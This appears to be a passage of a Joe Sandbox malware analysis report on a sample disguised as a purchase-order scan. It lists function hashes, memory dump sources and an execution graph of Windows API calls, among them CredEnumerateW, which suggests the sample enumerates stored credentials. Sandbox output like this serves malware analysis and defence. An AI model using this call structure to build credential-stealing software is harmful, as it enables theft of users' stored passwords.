                                                                                • API String ID: 4218353326-4089948878
                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                • Instruction ID: 790d0b4e7bbdf571888dfc4e93121c3832315001036c0db136eb5bf89c3cdf31
                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                • Instruction Fuzzy Hash: 9E110AB5900648AEDB10CFA8D880BEDFBFDEF0A204F104096E545E7262E7705B02C7A5
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 341D2903
                                                                                  • Part of subcall function 341D35D2: RaiseException.KERNEL32(?,?,?,341D2925,00000000,00000000,00000000,?,?,?,?,?,341D2925,?,341E21B8), ref: 341D3632
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 341D2920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3476068407-410509341
                                                                                • Opcode ID: 108129b4976648b4c9d9fc92df5e234c96a7a092c70bc6f2668813c502521b9c
                                                                                • Instruction ID: 925aa4f7c609aec7e89747b9b1470bc5da619ab17a2057b35e475e734fe55eb1
                                                                                • Opcode Fuzzy Hash: 108129b4976648b4c9d9fc92df5e234c96a7a092c70bc6f2668813c502521b9c
                                                                                • Instruction Fuzzy Hash: C1F0F9F8900F0DFB9B04AAA4ECC4979F36D5F03250F9045B4F93592090EF31EA16C580
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040336A,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,75923420,004035B6), ref: 00405DF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3266236984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.3266213612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266261293.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266278879.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: nsa
                                                                                • API String ID: 1716503409-2209301699
                                                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

                                                                                Execution Graph

                                                                                Execution Coverage:6.4%
                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                Signature Coverage:3.5%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:81
                                                                                execution_graph 37630 415321 realloc 37631 41534d 37630->37631 37632 415340 37630->37632 37634 416760 11 API calls 37631->37634 37634->37632 37635 44dea5 37636 44deb5 FreeLibrary 37635->37636 37637 44dec3 37635->37637 37636->37637 37638 4287c1 37639 4287d2 37638->37639 37642 429ac1 37638->37642 37643 428818 37639->37643 37644 42881f 37639->37644 37653 425711 37639->37653 37640 4259da 37701 416760 11 API calls 37640->37701 37672 425ad6 37642->37672 37708 415c56 11 API calls 37642->37708 37675 42013a 37643->37675 37703 420244 97 API calls 37644->37703 37646 4260dd 37702 424251 120 API calls 37646->37702 37649 4259c2 37649->37672 37695 415c56 11 API calls 37649->37695 37653->37640 37653->37642 37653->37649 37656 429a4d 37653->37656 37659 422aeb memset memcpy memcpy 37653->37659 37663 4260a1 37653->37663 37671 425a38 37653->37671 37691 4227f0 memset memcpy 37653->37691 37692 422b84 15 API calls 37653->37692 37693 422b5d memset memcpy memcpy 37653->37693 37694 422640 13 API calls 37653->37694 37696 4241fc 11 API calls 37653->37696 37697 42413a 90 API calls 37653->37697 37657 429a66 37656->37657 37658 429a9b 37656->37658 37704 415c56 11 API calls 37657->37704 37662 429a96 37658->37662 37706 416760 11 API calls 37658->37706 37659->37653 37707 424251 120 API calls 37662->37707 37700 415c56 11 API calls 37663->37700 37665 429a7a 37705 416760 11 API calls 37665->37705 37671->37649 37698 422640 13 API calls 37671->37698 37699 4226e0 12 API calls 37671->37699 37676 42014c 37675->37676 37679 420151 37675->37679 37718 41e466 97 API calls 37676->37718 37678 420162 37678->37653 37679->37678 37680 4201b3 37679->37680 37681 420229 37679->37681 37682 4201b8 37680->37682 37683 4201dc 37680->37683 37681->37678 37684 41fd5e 86 API calls 37681->37684 37709 41fbdb 37682->37709 37683->37678 37687 4201ff 37683->37687 37715 41fc4c 37683->37715 37684->37678 37687->37678 37690 42013a 97 API calls 37687->37690 37690->37678 37691->37653 37692->37653 37693->37653 37694->37653 37695->37640 37696->37653 37697->37653 37698->37671 37699->37671 37700->37640 37701->37646 37702->37672 37703->37653 37704->37665 37705->37662 37706->37662 37707->37642 37708->37640 37710 41fbf1 37709->37710 37711 41fbf8 37709->37711 37714 41fc39 37710->37714 37733 4446ce 11 API calls 37710->37733 37723 41ee26 37711->37723 37714->37678 37719 41fd5e 37714->37719 37716 41ee6b 86 API calls 37715->37716 37717 41fc5d 37716->37717 37717->37683 37718->37679 37720 41fd65 37719->37720 37721 41fdab 37720->37721 37722 41fbdb 86 API calls 37720->37722 37721->37678 37722->37720 37724 41ee41 37723->37724 37725 41ee32 37723->37725 37734 41edad 37724->37734 37737 4446ce 11 API calls 37725->37737 37728 41ee3c 37728->37710 37731 41ee58 37731->37728 37739 41ee6b 37731->37739 37733->37714 37743 41be52 37734->37743 37737->37728 37738 41eb85 11 API calls 37738->37731 37740 41ee70 37739->37740 37741 41ee78 37739->37741 37796 41bf99 86 API calls 37740->37796 37741->37728 37744 41be6f 37743->37744 37745 41be5f 37743->37745 37750 41be8c 37744->37750 37775 418c63 memset memset 37744->37775 37774 4446ce 11 API calls 37745->37774 37747 41be69 37747->37728 37747->37738 37750->37747 37751 41bf3a 37750->37751 37753 41bed1 37750->37753 37755 41bee7 37750->37755 37778 4446ce 11 API calls 37751->37778 37754 41bef0 37753->37754 37757 41bee2 37753->37757 37754->37755 37756 41bf01 37754->37756 37755->37747 37779 41a453 86 API calls 37755->37779 37758 41bf24 memset 37756->37758 37760 41bf14 37756->37760 37776 418a6d memset memcpy memset 37756->37776 37764 41ac13 37757->37764 37758->37747 37777 41a223 memset memcpy memset 37760->37777 37763 41bf20 37763->37758 37765 41ac52 37764->37765 37766 41ac3f memset 37764->37766 37768 41ac6a 37765->37768 37780 41dc14 19 API calls 37765->37780 37771 41acd9 37766->37771 37769 41aca1 37768->37769 37781 41519d 37768->37781 37769->37771 37772 41acc0 memset 37769->37772 37773 41accd memcpy 37769->37773 37771->37755 37772->37771 37773->37771 37774->37747 37775->37750 37776->37760 37777->37763 37778->37755 37780->37768 37784 4175ed 37781->37784 37792 417570 SetFilePointer 37784->37792 37787 41760a ReadFile 37788 417637 37787->37788 37789 417627 GetLastError 37787->37789 37790 4151b3 37788->37790 37791 41763e memset 37788->37791 37789->37790 37790->37769 37791->37790 37793 41759c GetLastError 37792->37793 37795 4175b2 37792->37795 37794 4175a8 GetLastError 37793->37794 37793->37795 37794->37795 37795->37787 37795->37790 37796->37741 37797 417bc5 37798 417c61 37797->37798 37799 417bda 37797->37799 37799->37798 37800 417bf6 UnmapViewOfFile CloseHandle 37799->37800 37802 417c2c 37799->37802 37804 4175b7 37799->37804 37800->37799 37800->37800 37802->37799 37809 41851e 20 API calls 37802->37809 37805 4175d6 CloseHandle 37804->37805 37806 4175c8 37805->37806 37807 4175df 37805->37807 37806->37807 37808 4175ce Sleep 37806->37808 37807->37799 37808->37805 37809->37802 37810 4152c7 malloc 37811 4152ef 37810->37811 37813 4152e2 37810->37813 37814 416760 11 API calls 37811->37814 37814->37813 37815 415308 free 37816 41276d 37817 41277d 37816->37817 37859 4044a4 LoadLibraryW 37817->37859 37819 412785 37820 412789 37819->37820 37867 414b81 37819->37867 37823 4127c8 37873 412465 memset ??2@YAPAXI 37823->37873 37825 4127ea 37885 40ac21 37825->37885 37830 412813 37903 40dd07 memset 37830->37903 37831 412827 37908 40db69 memset 37831->37908 37834 412822 37929 4125b6 ??3@YAXPAX 37834->37929 37836 40ada2 _wcsicmp 37838 41283d 37836->37838 37838->37834 37841 412863 CoInitialize 37838->37841 37913 41268e 37838->37913 37933 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37841->37933 37844 41296f 37935 40b633 37844->37935 37846 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37851 412957 CoUninitialize 37846->37851 37856 4128ca 37846->37856 37851->37834 37852 4128d0 TranslateAcceleratorW 37853 412941 GetMessageW 37852->37853 37852->37856 37853->37851 37853->37852 37854 412909 IsDialogMessageW 37854->37853 37854->37856 37855 4128fd IsDialogMessageW 37855->37853 37855->37854 37856->37852 37856->37854 37856->37855 37857 41292b TranslateMessage DispatchMessageW 37856->37857 37858 41291f IsDialogMessageW 37856->37858 37857->37853 37858->37853 37858->37857 37860 4044f7 37859->37860 37861 4044cf GetProcAddress 37859->37861 37865 404507 MessageBoxW 37860->37865 37866 40451e 37860->37866 37862 4044e8 FreeLibrary 37861->37862 37863 4044df 37861->37863 37862->37860 37864 4044f3 37862->37864 37863->37862 37864->37860 37865->37819 37866->37819 37868 414b8a 37867->37868 37869 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37867->37869 37939 40a804 memset 37868->37939 37869->37823 37872 414b9e GetProcAddress 37872->37869 37874 4124e0 37873->37874 37875 412505 ??2@YAPAXI 37874->37875 37876 41251c 37875->37876 37881 412521 37875->37881 37961 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37876->37961 37950 444722 37881->37950 37884 41259b wcscpy 37884->37825 37966 40b1ab free free 37885->37966 37887 40ad76 37967 40aa04 37887->37967 37890 40a9ce malloc memcpy free free 37893 40ac5c 37890->37893 37891 40ad4b 37891->37887 37990 40a9ce 37891->37990 37893->37887 37893->37890 37893->37891 37894 40ace7 free 37893->37894 37970 40a8d0 37893->37970 37982 4099f4 37893->37982 37894->37893 37898 40a8d0 7 API calls 37898->37887 37899 40ada2 37900 40adc9 37899->37900 37901 40adaa 37899->37901 37900->37830 37900->37831 37901->37900 37902 40adb3 _wcsicmp 37901->37902 37902->37900 37902->37901 37995 40dce0 37903->37995 37905 40dd3a GetModuleHandleW 38000 40dba7 37905->38000 37909 40dce0 3 API calls 37908->37909 37910 40db99 37909->37910 38072 40dae1 37910->38072 38086 402f3a 37913->38086 37915 412766 37915->37834 37915->37841 37916 4126d3 _wcsicmp 37917 4126a8 37916->37917 37917->37915 37917->37916 37919 41270a 37917->37919 38120 4125f8 7 API calls 37917->38120 37919->37915 38089 411ac5 37919->38089 37930 4125da 37929->37930 37931 4125f0 37930->37931 37932 4125e6 DeleteObject 37930->37932 37934 40b1ab free free 37931->37934 37932->37931 37933->37846 37934->37844 37936 40b640 37935->37936 37937 40b639 free 37935->37937 37938 40b1ab free free 37936->37938 37937->37936 37938->37820 37940 40a83b GetSystemDirectoryW 37939->37940 37941 40a84c wcscpy 37939->37941 37940->37941 37946 409719 wcslen 37941->37946 37944 40a881 LoadLibraryW 37945 40a886 37944->37945 37945->37869 37945->37872 37947 409724 37946->37947 37948 409739 wcscat LoadLibraryW 37946->37948 37947->37948 37949 40972c wcscat 37947->37949 37948->37944 37948->37945 37949->37948 37951 444732 37950->37951 37952 444728 DeleteObject 37950->37952 37962 409cc3 37951->37962 37952->37951 37954 412551 37955 4010f9 37954->37955 37956 401130 37955->37956 37957 401134 GetModuleHandleW LoadIconW 37956->37957 37958 401107 wcsncat 37956->37958 37959 40a7be 37957->37959 37958->37956 37960 40a7d2 37959->37960 37960->37884 37960->37960 37961->37881 37965 409bfd memset wcscpy 37962->37965 37964 409cdb CreateFontIndirectW 37964->37954 37965->37964 37966->37893 37968 40aa14 37967->37968 37969 40aa0a free 37967->37969 37968->37899 37969->37968 37971 40a8eb 37970->37971 37972 40a8df wcslen 37970->37972 37973 40a906 free 37971->37973 37974 40a90f 37971->37974 37972->37971 37975 40a919 37973->37975 37976 4099f4 3 API calls 37974->37976 37977 40a932 37975->37977 37978 40a929 free 37975->37978 37976->37975 37980 4099f4 3 API calls 37977->37980 37979 40a93e memcpy 37978->37979 37979->37893 37981 40a93d 37980->37981 37981->37979 37983 409a41 37982->37983 37984 4099fb malloc 37982->37984 37983->37893 37986 409a37 37984->37986 37987 409a1c 37984->37987 37986->37893 37988 409a30 free 37987->37988 37989 409a20 memcpy 37987->37989 37988->37986 37989->37988 37991 40a9e7 37990->37991 37992 40a9dc free 37990->37992 37993 4099f4 3 API calls 37991->37993 37994 40a9f2 37992->37994 37993->37994 37994->37898 38019 409bca GetModuleFileNameW 37995->38019 37997 40dce6 wcsrchr 37998 40dcf5 37997->37998 37999 40dcf9 wcscat 37997->37999 37998->37999 37999->37905 38020 44db70 38000->38020 38004 40dbfd 38023 4447d9 38004->38023 38007 40dc34 wcscpy wcscpy 38049 40d6f5 38007->38049 38008 40dc1f wcscpy 38008->38007 38011 40d6f5 3 API calls 38012 40dc73 38011->38012 38013 40d6f5 3 API calls 38012->38013 38014 40dc89 38013->38014 38015 40d6f5 3 API calls 38014->38015 38016 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38015->38016 38055 40da80 38016->38055 38019->37997 38021 40dbb4 memset memset 38020->38021 38022 409bca GetModuleFileNameW 38021->38022 38022->38004 38024 4447f4 38023->38024 38025 40dc1b 38024->38025 38026 444807 ??2@YAPAXI 38024->38026 38025->38007 38025->38008 38027 44481f 38026->38027 38028 444873 _snwprintf 38027->38028 38029 4448ab wcscpy 38027->38029 38062 44474a 8 API calls 38028->38062 38031 4448bb 38029->38031 38063 44474a 8 API calls 38031->38063 38032 4448a7 38032->38029 38032->38031 38034 4448cd 38064 44474a 8 API calls 38034->38064 38036 4448e2 38065 44474a 8 API calls 38036->38065 38038 4448f7 38066 44474a 8 API calls 38038->38066 38040 44490c 38067 44474a 8 API calls 38040->38067 38042 444921 38068 44474a 8 API calls 38042->38068 38044 444936 38069 44474a 8 API calls 38044->38069 38046 44494b 38070 44474a 8 API calls 38046->38070 38048 444960 ??3@YAXPAX 38048->38025 38050 44db70 38049->38050 38051 40d702 memset GetPrivateProfileStringW 38050->38051 38052 40d752 38051->38052 38053 40d75c WritePrivateProfileStringW 38051->38053 38052->38053 38054 40d758 38052->38054 38053->38054 38054->38011 38056 44db70 38055->38056 38057 40da8d memset 38056->38057 38058 40daac LoadStringW 38057->38058 38061 40dac6 38058->38061 38060 40dade 38060->37834 38061->38058 38061->38060 38071 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38061->38071 38062->38032 38063->38034 38064->38036 38065->38038 38066->38040 38067->38042 38068->38044 38069->38046 38070->38048 38071->38061 38082 409b98 GetFileAttributesW 38072->38082 38074 40daea 38075 40daef wcscpy wcscpy GetPrivateProfileIntW 38074->38075 38081 40db63 38074->38081 38083 40d65d GetPrivateProfileStringW 38075->38083 38077 40db3e 38084 40d65d GetPrivateProfileStringW 38077->38084 38079 40db4f 38085 40d65d GetPrivateProfileStringW 38079->38085 38081->37836 38082->38074 38083->38077 38084->38079 38085->38081 38121 40eaff 38086->38121 38090 411ae2 memset 38089->38090 38091 411b8f 38089->38091 38161 409bca GetModuleFileNameW 38090->38161 38103 411a8b 38091->38103 38093 411b0a wcsrchr 38094 411b22 wcscat 38093->38094 38095 411b1f 38093->38095 38162 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38094->38162 38095->38094 38097 411b67 38163 402afb 38097->38163 38101 411b7f 38219 40ea13 SendMessageW memset SendMessageW 38101->38219 38104 402afb 27 API calls 38103->38104 38105 411ac0 38104->38105 38106 4110dc 38105->38106 38107 41113e 38106->38107 38112 4110f0 38106->38112 38244 40969c LoadCursorW SetCursor 38107->38244 38109 411143 38245 4032b4 38109->38245 38263 444a54 38109->38263 38110 4110f7 _wcsicmp 38110->38112 38111 411157 38113 40ada2 _wcsicmp 38111->38113 38112->38107 38112->38110 38266 410c46 10 API calls 38112->38266 38116 411167 38113->38116 38114 4111af 38116->38114 38117 4111a6 qsort 38116->38117 38117->38114 38120->37917 38122 40eb10 38121->38122 38134 40e8e0 38122->38134 38125 40eb6c memcpy memcpy 38126 40ebb7 38125->38126 38126->38125 38127 40ebf2 ??2@YAPAXI ??2@YAPAXI 38126->38127 38129 40d134 16 API calls 38126->38129 38128 40ec65 38127->38128 38130 40ec2e ??2@YAPAXI 38127->38130 38144 40ea7f 38128->38144 38129->38126 38130->38128 38133 402f49 38133->37917 38135 40e8f2 38134->38135 38136 40e8eb ??3@YAXPAX 38134->38136 38137 40e900 38135->38137 38138 40e8f9 ??3@YAXPAX 38135->38138 38136->38135 38139 40e911 38137->38139 38140 40e90a ??3@YAXPAX 38137->38140 38138->38137 38141 40e931 ??2@YAPAXI ??2@YAPAXI 38139->38141 38142 40e921 ??3@YAXPAX 38139->38142 38143 40e92a ??3@YAXPAX 38139->38143 38140->38139 38141->38125 38142->38143 38143->38141 38145 40aa04 free 38144->38145 38146 40ea88 38145->38146 38147 40aa04 free 38146->38147 38148 40ea90 38147->38148 38149 40aa04 free 38148->38149 38150 40ea98 38149->38150 38151 40aa04 free 38150->38151 38152 40eaa0 38151->38152 38153 40a9ce 4 API calls 38152->38153 38154 40eab3 38153->38154 38155 40a9ce 4 API calls 38154->38155 38156 40eabd 38155->38156 38157 40a9ce 4 API calls 38156->38157 38158 40eac7 38157->38158 38159 40a9ce 4 API calls 38158->38159 38160 40ead1 38159->38160 38160->38133 38161->38093 38162->38097 38220 40b2cc 38163->38220 38165 402b0a 38166 40b2cc 27 API calls 38165->38166 38167 402b23 38166->38167 38168 40b2cc 27 API calls 38167->38168 38169 402b3a 38168->38169 38170 40b2cc 27 API calls 38169->38170 38171 402b54 38170->38171 38172 40b2cc 27 API calls 38171->38172 38173 402b6b 38172->38173 38174 40b2cc 27 API calls 38173->38174 38175 402b82 38174->38175 38176 40b2cc 27 API calls 38175->38176 38177 402b99 38176->38177 38178 40b2cc 27 API calls 38177->38178 38179 402bb0 38178->38179 38180 40b2cc 27 API calls 38179->38180 38181 402bc7 38180->38181 38182 40b2cc 27 API calls 38181->38182 38183 402bde 38182->38183 38184 40b2cc 27 API calls 38183->38184 38185 402bf5 38184->38185 38186 40b2cc 27 API calls 38185->38186 38187 402c0c 38186->38187 38188 40b2cc 27 API calls 38187->38188 38189 402c23 38188->38189 38190 40b2cc 27 API calls 38189->38190 38191 402c3a 38190->38191 38192 40b2cc 27 API calls 38191->38192 38193 402c51 38192->38193 38194 40b2cc 27 API calls 38193->38194 38195 402c68 38194->38195 38196 40b2cc 27 API calls 38195->38196 38197 402c7f 38196->38197 38198 40b2cc 27 API calls 38197->38198 38199 402c99 38198->38199 38200 40b2cc 27 API calls 38199->38200 38201 402cb3 38200->38201 38202 40b2cc 27 API calls 38201->38202 38203 402cd5 38202->38203 38204 40b2cc 27 API calls 38203->38204 38205 402cf0 38204->38205 38206 40b2cc 27 API calls 38205->38206 38207 402d0b 38206->38207 38208 40b2cc 27 API calls 38207->38208 38209 402d26 38208->38209 38210 40b2cc 27 API calls 38209->38210 38211 402d3e 38210->38211 38212 40b2cc 27 API calls 38211->38212 38213 402d59 38212->38213 38214 40b2cc 27 API calls 38213->38214 38215 402d78 38214->38215 38216 40b2cc 27 API calls 38215->38216 38217 402d93 38216->38217 38218 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38217->38218 38218->38101 38219->38091 38223 40b58d 38220->38223 38222 40b2d1 38222->38165 38224 40b5a4 GetModuleHandleW FindResourceW 38223->38224 38225 40b62e 38223->38225 38226 40b5c2 LoadResource 38224->38226 38228 40b5e7 38224->38228 38225->38222 38227 40b5d0 SizeofResource LockResource 38226->38227 38226->38228 38227->38228 38228->38225 38236 40afcf 38228->38236 38230 40b608 memcpy 38239 40b4d3 memcpy 38230->38239 38232 40b61e 38240 40b3c1 18 API calls 38232->38240 38234 40b626 38241 40b04b 38234->38241 38237 40b04b ??3@YAXPAX 38236->38237 38238 40afd7 ??2@YAPAXI 38237->38238 38238->38230 38239->38232 38240->38234 38242 40b051 ??3@YAXPAX 38241->38242 38243 40b05f 38241->38243 38242->38243 38243->38225 38244->38109 38246 4032c4 38245->38246 38247 40b633 free 38246->38247 38248 403316 38247->38248 38267 44553b 38248->38267 38252 403480 38465 40368c 15 API calls 38252->38465 38254 403489 38255 40b633 free 38254->38255 38257 403495 38255->38257 38256 40333c 38256->38252 38258 4033a9 memset memcpy 38256->38258 38259 4033ec wcscmp 38256->38259 38463 4028e7 11 API calls 38256->38463 38464 40f508 6 API calls 38256->38464 38257->38111 38258->38256 38258->38259 38259->38256 38262 403421 _wcsicmp 38262->38256 38264 444a64 FreeLibrary 38263->38264 38265 444a83 38263->38265 38264->38265 38265->38111 38266->38112 38268 445548 38267->38268 38269 445599 38268->38269 38466 40c768 38268->38466 38270 4455a8 memset 38269->38270 38277 4457f2 38269->38277 38549 403988 38270->38549 38280 445854 38277->38280 38651 403e2d memset memset memset memset memset 38277->38651 38278 4455e5 38289 445672 38278->38289 38294 44560f 38278->38294 38279 4458bb memset memset 38282 414c2e 17 API calls 38279->38282 38333 4458aa 38280->38333 38674 403c9c memset memset memset memset memset 38280->38674 38285 4458f9 38282->38285 38284 44595e memset memset 38292 414c2e 17 API calls 38284->38292 38293 40b2cc 27 API calls 38285->38293 38287 44558c 38533 444b06 38287->38533 38288 44557a 38288->38287 38747 4136c0 CoTaskMemFree 38288->38747 38560 403fbe memset memset memset memset memset 38289->38560 38290 445a00 memset memset 38697 414c2e 38290->38697 38291 445b22 38297 445bca 38291->38297 38298 445b38 memset memset memset 38291->38298 38302 44599c 38292->38302 38304 445909 38293->38304 38306 4087b3 338 API calls 38294->38306 38296 445849 38763 40b1ab free free 38296->38763 38305 445c8b memset memset 38297->38305 38371 445cf0 38297->38371 38309 445bd4 38298->38309 38310 445b98 38298->38310 38303 40b2cc 27 API calls 38302->38303 38317 4459ac 38303->38317 38314 409d1f 6 API calls 38304->38314 38318 414c2e 17 API calls 38305->38318 38315 445621 38306->38315 38307 44589f 38764 40b1ab free free 38307->38764 38308 445585 38748 41366b FreeLibrary 38308->38748 38324 414c2e 17 API calls 38309->38324 38310->38309 38320 445ba2 38310->38320 38313 403335 38462 4452e5 45 API calls 38313->38462 38328 445919 38314->38328 38749 4454bf 20 API calls 38315->38749 38316 445823 38316->38296 38338 4087b3 338 API calls 38316->38338 38329 409d1f 6 API calls 38317->38329 38330 445cc9 38318->38330 38836 4099c6 wcslen 38320->38836 38321 4456b2 38751 40b1ab free free 38321->38751 38323 40b2cc 27 API calls 38334 445a4f 38323->38334 38325 445be2 38324->38325 38336 40b2cc 27 API calls 38325->38336 38326 445d3d 38356 40b2cc 27 API calls 38326->38356 38327 445d88 memset memset memset 38339 414c2e 17 API calls 38327->38339 38765 409b98 GetFileAttributesW 38328->38765 38340 4459bc 38329->38340 38341 409d1f 6 API calls 38330->38341 38331 445879 38331->38307 38352 4087b3 338 API calls 38331->38352 38333->38279 38357 44594a 38333->38357 38713 409d1f wcslen wcslen 38334->38713 38346 445bf3 38336->38346 38338->38316 38349 445dde 38339->38349 38832 409b98 GetFileAttributesW 38340->38832 38351 445ce1 38341->38351 38342 445bb3 38839 445403 memset 38342->38839 38343 445680 38343->38321 38583 4087b3 memset 38343->38583 38355 409d1f 6 API calls 38346->38355 38347 445928 38347->38357 38766 40b6ef 38347->38766 38358 40b2cc 27 API calls 38349->38358 38856 409b98 GetFileAttributesW 38351->38856 38352->38331 38354 40b2cc 27 API calls 38363 445a94 38354->38363 38365 445c07 38355->38365 38366 445d54 _wcsicmp 38356->38366 38357->38284 38370 4459ed 38357->38370 38369 445def 38358->38369 38359 4459cb 38359->38370 38379 40b6ef 253 API calls 38359->38379 38718 40ae18 38363->38718 38364 44566d 38364->38277 38634 413d4c 38364->38634 38375 445389 259 API calls 38365->38375 38376 445d71 38366->38376 38439 445d67 38366->38439 38368 445665 38750 40b1ab free free 38368->38750 38377 409d1f 6 API calls 38369->38377 38370->38290 38370->38291 38371->38313 38371->38326 38371->38327 38372 445389 259 API calls 38372->38297 38381 445c17 38375->38381 38857 445093 23 API calls 38376->38857 38384 445e03 38377->38384 38379->38370 38380 4456d8 38386 40b2cc 27 API calls 38380->38386 38387 40b2cc 27 API calls 38381->38387 38383 44563c 38383->38368 38389 4087b3 338 API calls 38383->38389 38858 409b98 GetFileAttributesW 38384->38858 38385 40b6ef 253 API calls 38385->38313 38391 4456e2 38386->38391 38392 445c23 38387->38392 38388 445d83 38388->38313 38389->38383 38752 413fa6 _wcsicmp _wcsicmp 38391->38752 38396 409d1f 6 API calls 38392->38396 38394 445e12 38401 445e6b 38394->38401 38408 40b2cc 27 API calls 38394->38408 38399 445c37 38396->38399 38397 445aa1 38400 445b17 38397->38400 38415 445ab2 memset 38397->38415 38428 409d1f 6 API calls 38397->38428 38725 40add4 38397->38725 38730 445389 38397->38730 38739 40ae51 38397->38739 38398 4456eb 38404 4456fd memset memset memset memset 38398->38404 38405 4457ea 38398->38405 38406 445389 259 API calls 38399->38406 38833 40aebe 38400->38833 38860 445093 23 API calls 38401->38860 38753 409c70 wcscpy wcsrchr 38404->38753 38756 413d29 38405->38756 38411 445c47 38406->38411 38412 445e33 38408->38412 38409 445e7e 38414 445f67 38409->38414 38417 40b2cc 27 API calls 38411->38417 38418 409d1f 6 API calls 38412->38418 38423 40b2cc 27 API calls 38414->38423 38419 40b2cc 27 API calls 38415->38419 38421 445c53 38417->38421 38422 445e47 38418->38422 38419->38397 38420 409c70 2 API calls 38424 44577e 38420->38424 38425 409d1f 6 API calls 38421->38425 38859 409b98 GetFileAttributesW 38422->38859 38427 445f73 38423->38427 38429 409c70 2 API calls 38424->38429 38430 445c67 38425->38430 38432 409d1f 6 API calls 38427->38432 38428->38397 38433 44578d 38429->38433 38434 445389 259 API calls 38430->38434 38431 445e56 38431->38401 38437 445e83 memset 38431->38437 38435 445f87 38432->38435 38433->38405 38441 40b2cc 27 API calls 38433->38441 38434->38297 38863 409b98 GetFileAttributesW 38435->38863 38440 40b2cc 27 API calls 38437->38440 38439->38313 38439->38385 38442 445eab 38440->38442 38443 4457a8 38441->38443 38444 409d1f 6 API calls 38442->38444 38445 409d1f 6 API calls 38443->38445 38446 445ebf 38444->38446 38447 4457b8 38445->38447 38448 40ae18 9 API calls 38446->38448 38755 409b98 GetFileAttributesW 38447->38755 38458 445ef5 38448->38458 38450 4457c7 38450->38405 38452 4087b3 338 API calls 38450->38452 38451 40ae51 9 API calls 38451->38458 38452->38405 38453 445f5c 38455 40aebe FindClose 38453->38455 38454 40add4 2 API calls 38454->38458 38455->38414 38456 40b2cc 27 API calls 38456->38458 38457 409d1f 6 API calls 38457->38458 38458->38451 38458->38453 38458->38454 38458->38456 38458->38457 38460 445f3a 38458->38460 38861 409b98 GetFileAttributesW 38458->38861 38862 445093 23 API calls 38460->38862 38462->38256 38463->38262 38464->38256 38465->38254 38467 40c775 38466->38467 38864 40b1ab free free 38467->38864 38469 40c788 38865 40b1ab free free 38469->38865 38471 40c790 38866 40b1ab free free 38471->38866 38473 40c798 38474 40aa04 free 38473->38474 38475 40c7a0 38474->38475 38867 40c274 memset 38475->38867 38480 40a8ab 9 API calls 38481 40c7c3 38480->38481 38482 40a8ab 9 API calls 38481->38482 38483 40c7d0 38482->38483 38896 40c3c3 38483->38896 38487 40c877 38496 40bdb0 38487->38496 38488 40c86c 38938 4053fe 39 API calls 38488->38938 38494 40c7e5 38494->38487 38494->38488 38495 40c634 50 API calls 38494->38495 38921 40a706 38494->38921 38495->38494 39201 404363 38496->39201 38499 40bf5d 39221 40440c 38499->39221 38500 40bdee 38500->38499 38504 40b2cc 27 API calls 38500->38504 38501 40bddf CredEnumerateW 38501->38500 38505 40be02 wcslen 38504->38505 38505->38499 38510 40be1e 38505->38510 38506 40be26 wcsncmp 38506->38510 38509 40be7d memset 38509->38510 38511 40bea7 memcpy 38509->38511 38510->38499 38510->38506 38510->38509 38510->38511 38512 40bf11 wcschr 38510->38512 38513 40b2cc 27 API calls 38510->38513 38515 40bf43 LocalFree 38510->38515 39224 40bd5d 